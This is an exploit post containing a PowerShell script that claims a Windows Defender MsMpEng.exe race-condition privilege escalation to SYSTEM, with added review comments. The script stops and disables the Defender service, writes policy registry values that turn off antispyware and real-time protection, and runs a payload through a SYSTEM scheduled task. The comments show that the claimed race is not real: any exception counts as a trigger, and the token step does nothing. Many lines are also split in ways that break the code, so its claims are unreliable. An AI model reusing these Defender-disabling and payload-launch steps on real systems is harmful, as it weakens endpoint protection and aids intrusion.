==================================================================================================================================
| # Title : Windows Defender MsMpEng.exe Race Condition Local Privilege Escalation PowerShell Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://www.microsoft.com/ |
==================================================================================================================================
[+] Summary : This PowerShell script demonstrates a local privilege
escalation (LPE) attack targeting a race condition in the Windows Defender
engine (MsMpEng.exe).
[+] POC :
<#
.SYNOPSIS
.\WinDefender_LPE.ps1
.\WinDefender_LPE.ps1 -RaceIterations 200 -DisableDefender
#>
param(
# NOTE(review): many statements in this listing are split across two lines
# (e.g. `return` / expression, `-ErrorAction` / `SilentlyContinue`), which
# changes their meaning in PowerShell; this looks like an extraction artifact.
# Number of passes of the Invoke-RaceCondition loop (each pass sleeps 50 ms).
[int]$RaceIterations = 100,
# After the run, call Disable-DefenderPersistence (service + HKLM policy changes).
[switch]$DisableDefender,
# After the run, call Restore-Defender to revert those changes.
[switch]$Cleanup,
# File handed to Invoke-SystemPayload; when it does not exist, Main writes a
# batch-script stand-in to %TEMP%\payload_<random>.exe and uses that instead.
[string]$PayloadPath = "$env:TEMP\payload.exe"
)
# Timestamped console logger used by every other function in this script.
# $Message is printed as "[HH:mm:ss] <message>"; $Color is either one of the
# severity names SUCCESS/ERROR/WARNING/INFO (mapped to a console colour below)
# or a raw ConsoleColor name that is passed through unchanged.
# NOTE(review): as pasted, `-ForegroundColor` and its value `$colorName` sit on
# separate lines, so the colour is not bound to the parameter; presumably a
# line-wrap artifact of the listing.
function Write-ColorOutput {
param(
[string]$Message,
[string]$Color = "White"
)
# Severity name -> console colour; unknown names fall through as-is.
$colors = @{
"SUCCESS" = "Green"
"ERROR" = "Red"
"WARNING" = "Yellow"
"INFO" = "Cyan"
}
$colorName = if ($colors.ContainsKey($Color)) { $colors[$Color] } else
{ $Color }
Write-Host "[$(Get-Date -Format 'HH:mm:ss')] $Message" -ForegroundColor
$colorName
}
# Returns whether the current Windows identity holds the built-in
# Administrator role.
# NOTE(review): as pasted, `return` sits alone on its line, so the function
# returns $null before the IsInRole(...) expression on the next line is
# reached, and Main's `-not (Test-Admin)` warning fires unconditionally; the
# split of `New-Object` from its type name looks like the same line-wrap
# artifact. Main only warns on the result and never requires elevation.
function Test-Admin {
$currentUser = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object
Security.Principal.WindowsPrincipal($currentUser)
return
$principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}
# Reports the current state of the WinDefend service.
# Returns: the ServiceControllerStatus of WinDefend, or the string "Not Found"
# when Get-Service throws (service absent or not queryable).
function Get-DefenderStatus {
    $status = "Not Found"
    try {
        $svc = Get-Service -Name WinDefend -ErrorAction Stop
        $status = $svc.Status
    } catch {
        # Get-Service failed; keep the sentinel value.
    }
    return $status
}
# Writes a small stand-in "ISO" to $Path: the ASCII text "CD001" repeated 512
# times followed by 1024 NUL bytes (3584 bytes in total), then returns whether
# the file exists afterwards. "CD001" is the ISO 9660 standard identifier, but
# this layout is not a valid image (no volume descriptor at the expected
# offset), so Mount-DiskImage is expected to reject it — NOTE(review): confirm
# on a test host. Artifact: %TEMP%\fake_<random>.iso (Main removes it again).
function New-FakeISO {
param([string]$Path)
Write-ColorOutput "Creating fake ISO at $Path" "INFO"
$isoContent = "CD001" * 512
$isoContent += "`0" * 1024
[System.IO.File]::WriteAllBytes($Path,
[System.Text.Encoding]::ASCII.GetBytes($isoContent))
# Success is judged purely by the file's existence.
if (Test-Path $Path) {
Write-ColorOutput "Fake ISO created successfully" "SUCCESS"
return $true
}
return $false
}
# Mounts $IsoPath with Mount-DiskImage and reports the outcome via the log and
# the return value; any exception is logged as ERROR and yields $false.
# The -PassThru result captured in $result is never used, and Main never
# checks this function's return value either.
function Mount-ISO {
param([string]$IsoPath)
Write-ColorOutput "Mounting ISO $IsoPath" "INFO"
try {
$result = Mount-DiskImage -ImagePath $IsoPath -PassThru
-ErrorAction Stop
Write-ColorOutput "ISO mounted successfully" "SUCCESS"
return $true
} catch {
Write-ColorOutput "Failed to mount ISO: $($_.Exception.Message)"
"ERROR"
return $false
}
}
# Best-effort dismount of $IsoPath. Dismount-DiskImage runs with
# -ErrorAction SilentlyContinue and the catch block is empty, so failures are
# swallowed and "ISO unmounted" is logged whether or not anything was mounted.
function Dismount-ISO {
param([string]$IsoPath)
try {
Dismount-DiskImage -ImagePath $IsoPath -ErrorAction SilentlyContinue
Write-ColorOutput "ISO unmounted" "INFO"
} catch {
# Intentionally empty: dismount errors are ignored.
}
}
# Raises the current PowerShell process ($pid) to the RealTime priority class.
# Returns $true on success, $false (after a WARNING) if the assignment throws.
# NOTE(review): without SeIncreaseBasePriorityPrivilege Windows is expected to
# cap the request at High rather than throw, so $true does not prove RealTime
# was granted — confirm. Main ignores the return value anyway.
function Set-RealtimePriority {
Write-ColorOutput "Setting process to REALTIME priority class" "INFO"
try {
$process = Get-Process -Id $pid
$process.PriorityClass =
[System.Diagnostics.ProcessPriorityClass]::RealTime
Write-ColorOutput "Realtime priority set" "SUCCESS"
return $true
} catch {
Write-ColorOutput "Failed to set realtime priority:
$($_.Exception.Message)" "WARNING"
return $false
}
}
# Runs $Iterations passes of: request a VSS shadow copy of C:\ through WMI,
# launch MpCmdRun.exe -Scan -ScanType 3 hidden, write and delete
# %TEMP%\race_<i>.txt, then sleep 50 ms.
# Returns: $true if any pass threw, $false otherwise.
# NOTE(review): the catch treats *any* exception as "RACE TRIGGERED" — e.g.
# WMI access denied for a non-elevated caller, or a missing MpCmdRun.exe — so
# the return value is not evidence of a race, and nothing here observes
# MsMpEng.exe at all. Shadow-copy creation normally needs elevation — confirm.
# Observable artifacts of a run: repeated shadow-copy creations, repeated
# MpCmdRun.exe launches from a user shell, and race_*.txt churn in %TEMP%.
function Invoke-RaceCondition {
param([int]$Iterations)
Write-ColorOutput "Triggering race condition with $Iterations
iterations" "INFO"
$successCount = 0
$raceTriggered = $false
for ($i = 0; $i -lt $Iterations; $i++) {
try {
# Shadow copy of C:\ (ClientAccessible context); result is unused.
$shadow = (Get-WmiObject -List Win32_ShadowCopy).Create("C:\",
"ClientAccessible")
# Hidden on-demand scan; errors from Start-Process are suppressed.
Start-Process -FilePath "C:\Program Files\Windows
Defender\MpCmdRun.exe" -ArgumentList "-Scan -ScanType 3" -WindowStyle
Hidden -ErrorAction SilentlyContinue
# Create-then-delete a throwaway file in the user's TEMP.
$testFile = "$env:TEMP\race_$i.txt"
"test" | Out-File -FilePath $testFile -ErrorAction
SilentlyContinue
Remove-Item $testFile -ErrorAction SilentlyContinue
$successCount++
if ($i % 10 -eq 0) {
Write-ColorOutput "Race iteration $i/$Iterations completed"
"INFO"
}
} catch {
# Any exception at all is reported as the race having fired.
Write-ColorOutput "RACE TRIGGERED at iteration $i!" "WARNING"
$raceTriggered = $true
break
}
Start-Sleep -Milliseconds 50
}
Write-ColorOutput "Completed $successCount iterations" "INFO"
return $raceTriggered
}
# Attempts to stop and disable the WinDefend service and to write the policy
# values HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware=1
# and ...\Real-Time Protection\DisableRealtimeMonitoring=1.
# Returns: $true unless a terminating error escapes. Because every step uses
# -ErrorAction SilentlyContinue, "Windows Defender disabled" is logged even
# when nothing changed (non-elevated caller, Tamper Protection, or the
# protected status of WinDefend rejecting the change — confirm).
# Detection note: creation of these policy values and a WinDefend stop or
# startup-type change from a user shell are high-signal, well-logged events.
function Disable-DefenderPersistence {
Write-ColorOutput "Disabling Windows Defender persistence..." "WARNING"
try {
# Service stop + startup type Disabled.
Stop-Service -Name WinDefend -Force -ErrorAction SilentlyContinue
Set-Service -Name WinDefend -StartupType Disabled -ErrorAction
SilentlyContinue
# Policy value 1: DisableAntiSpyware.
$regPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"
New-Item -Path $regPath -Force -ErrorAction SilentlyContinue
Set-ItemProperty -Path $regPath -Name "DisableAntiSpyware" -Value 1
-Force -ErrorAction SilentlyContinue
# Policy value 2: Real-Time Protection\DisableRealtimeMonitoring.
$rtpPath = "$regPath\Real-Time Protection"
New-Item -Path $rtpPath -Force -ErrorAction SilentlyContinue
Set-ItemProperty -Path $rtpPath -Name "DisableRealtimeMonitoring"
-Value 1 -Force -ErrorAction SilentlyContinue
Write-ColorOutput "Windows Defender disabled" "SUCCESS"
return $true
} catch {
Write-ColorOutput "Failed to disable Defender:
$($_.Exception.Message)" "ERROR"
return $false
}
}
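# Reverts the changes made by Disable-DefenderPersistence: removes both policy
# values it writes (DisableAntiSpyware and Real-Time Protection\
# DisableRealtimeMonitoring), sets WinDefend back to Automatic, starts it, and
# clears the real-time-monitoring preference.
# Returns: $true when the steps ran, $false (after a WARNING) if one threw.
# NOTE(review): every cmdlet here uses -ErrorAction SilentlyContinue, so the
# catch branch is reached only for terminating errors; a "restored" message
# does not prove Defender is running again — verify with Get-DefenderStatus.
function Restore-Defender {
    Write-ColorOutput "Restoring Windows Defender..." "INFO"
    try {
        $regPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"
        $rtpPath = "$regPath\Real-Time Protection"
        # Both policy values must go: a lingering DisableRealtimeMonitoring
        # policy overrides the Set-MpPreference call below.
        Remove-ItemProperty -Path $regPath -Name "DisableAntiSpyware" -ErrorAction SilentlyContinue -Force
        Remove-ItemProperty -Path $rtpPath -Name "DisableRealtimeMonitoring" -ErrorAction SilentlyContinue -Force
        Set-Service -Name WinDefend -StartupType Automatic -ErrorAction SilentlyContinue
        Start-Service -Name WinDefend -ErrorAction SilentlyContinue
        Set-MpPreference -DisableRealtimeMonitoring $false -ErrorAction SilentlyContinue
        Write-ColorOutput "Windows Defender restored" "SUCCESS"
        return $true
    } catch {
        Write-ColorOutput "Failed to restore Defender: $($_.Exception.Message)" "WARNING"
        return $false
    }
}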
# Tries to run $PayloadPath "as SYSTEM" in two ways and returns $true on the
# first that does not throw, $false if both fail.
# Method 1 reads winlogon's process handle into $token and never uses it; the
# ProcessStartInfo carries no credentials, so Process.Start launches the
# payload in the caller's own context and "Payload executed via winlogon"
# does not imply SYSTEM.
# Method 2 creates, runs and deletes a one-shot scheduled task named
# TempTask<random> with /ru SYSTEM. Creating a SYSTEM task requires an
# already-elevated caller — confirm — so this is not an escalation step
# either. schtasks is a native command, so a non-zero exit typically does not
# reach the catch; only a missing executable or similar would.
# Detection note: task create/run/delete events for a TempTask* name within
# a couple of seconds of each other.
function Invoke-SystemPayload {
param([string]$PayloadPath)
Write-ColorOutput "Attempting to execute payload as SYSTEM..." "INFO"
try {
# Method 1: labelled "winlogon token", but $token is never used below.
$winlogon = Get-Process -Name winlogon -ErrorAction Stop
$token = $winlogon.Handle
$startInfo = New-Object System.Diagnostics.ProcessStartInfo
$startInfo.FileName = $PayloadPath
$startInfo.UseShellExecute = $false
$startInfo.CreateNoWindow = $true
$startInfo.WindowStyle =
[System.Diagnostics.ProcessWindowStyle]::Hidden
# Starts under the current user's token (no UserName/Password set).
[System.Diagnostics.Process]::Start($startInfo) | Out-Null
Write-ColorOutput "Payload executed via winlogon" "SUCCESS"
return $true
} catch {
Write-ColorOutput "Winlogon method failed: $($_.Exception.Message)"
"WARNING"
}
try {
# Method 2: one-shot scheduled task, created, run, then deleted after 2 s.
$taskName = "TempTask" +
[System.IO.Path]::GetRandomFileName().Replace('.', '')
schtasks /create /tn $taskName /tr $PayloadPath /sc once /st 00:00
/ru SYSTEM /f | Out-Null
schtasks /run /tn $taskName | Out-Null
Start-Sleep -Seconds 2
schtasks /delete /tn $taskName /f | Out-Null
Write-ColorOutput "Payload executed via scheduled task" "SUCCESS"
return $true
} catch {
Write-ColorOutput "Scheduled task method failed:
$($_.Exception.Message)" "WARNING"
}
Write-ColorOutput "Failed to execute payload as SYSTEM" "ERROR"
return $false
}
# Writes a small batch-script payload to $Path: it records whoami and the
# date/time in %temp%\defender_lpe.txt and launches calc.exe. Returns $true
# unconditionally (a WriteAllText failure would propagate to the caller).
# The file %temp%\defender_lpe.txt is the script's "success" artifact; whatever
# account actually ran the payload writes its own name there.
function New-TestPayload {
param([string]$Path)
Write-ColorOutput "Creating test payload at $Path" "INFO"
$payload = @'
@echo off
echo [+] Exploit successful! Running as: > %temp%\defender_lpe.txt
whoami >> %temp%\defender_lpe.txt
echo [+] Date: %date% %time% >> %temp%\defender_lpe.txt
calc.exe
'@
[System.IO.File]::WriteAllText($Path, $payload)
return $true
}
# Orchestrates the run: banner, environment checks, the "race" loop, payload
# launch, and the optional Defender disable/restore steps.
# Observations: the admin-check result, the Set-RealtimePriority result and
# $mountSuccess are never acted upon — the script proceeds regardless. A
# generated %TEMP%\payload_<random>.exe is not removed afterwards, unlike the
# fake ISO.
function Main {
Write-ColorOutput @"
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Windows Defender MsMpEng.exe Race Condition LPE β
β Local Privilege Escalation to SYSTEM β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
"@ "INFO"
Write-ColorOutput "Target: $env:COMPUTERNAME" "INFO"
Write-ColorOutput "User: $env:USERNAME" "INFO"
# Elevation is only warned about, never required, although the later
# shadow-copy, service, HKLM policy and SYSTEM-task steps are all expected
# to need it.
if (-not (Test-Admin)) {
Write-ColorOutput "Not running as administrator. Exploit may fail."
"WARNING"
}
# Hard requirement: WinDefend must report Running, otherwise stop here.
$defenderStatus = Get-DefenderStatus
Write-ColorOutput "Windows Defender status: $defenderStatus" "INFO"
if ($defenderStatus -ne "Running") {
Write-ColorOutput "Windows Defender is not running. Exploit may not
work." "ERROR"
return
}
# Return value ignored.
Set-RealtimePriority
# Temporary stand-in ISO in %TEMP%; the mount result is never checked.
$isoPath = "$env:TEMP\fake_$(Get-Random).iso"
if (-not (New-FakeISO -Path $isoPath)) {
Write-ColorOutput "Failed to create fake ISO" "ERROR"
return
}
$mountSuccess = Mount-ISO -IsoPath $isoPath
# $raceTriggered really means "some pass of the loop threw".
$raceTriggered = Invoke-RaceCondition -Iterations $RaceIterations
Dismount-ISO -IsoPath $isoPath
Remove-Item $isoPath -Force -ErrorAction SilentlyContinue
# Service state before/after the loop is compared but only logged.
$newDefenderStatus = Get-DefenderStatus
if ($newDefenderStatus -ne $defenderStatus) {
Write-ColorOutput "Windows Defender status changed: $defenderStatus
-> $newDefenderStatus" "WARNING"
}
# Use the caller's -PayloadPath if it exists, else write the batch stand-in
# (note: the stand-in is left behind in %TEMP%).
$payloadPath = if ($PayloadPath -and (Test-Path $PayloadPath)) {
$PayloadPath
} else {
$tempPayload = "$env:TEMP\payload_$(Get-Random).exe"
New-TestPayload -Path $tempPayload
$tempPayload
}
# Payload launch is attempted only when a loop pass threw.
if ($raceTriggered) {
Write-ColorOutput "Race condition triggered successfully!" "SUCCESS"
Invoke-SystemPayload -PayloadPath $payloadPath
} else {
Write-ColorOutput "Race condition may not have triggered" "WARNING"
}
# Optional post-run steps: -DisableDefender applies the service/policy
# changes, -Cleanup reverts them; with both switches the restore runs last.
if ($DisableDefender) {
Disable-DefenderPersistence
}
if ($Cleanup) {
Restore-Defender
}
Write-ColorOutput "Exploit completed" "INFO"
}
# Script entry point: everything above only defines parameters and functions.
Main
Greetings to
:==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John
Page aka hyp3rlinx)|
============================================================================================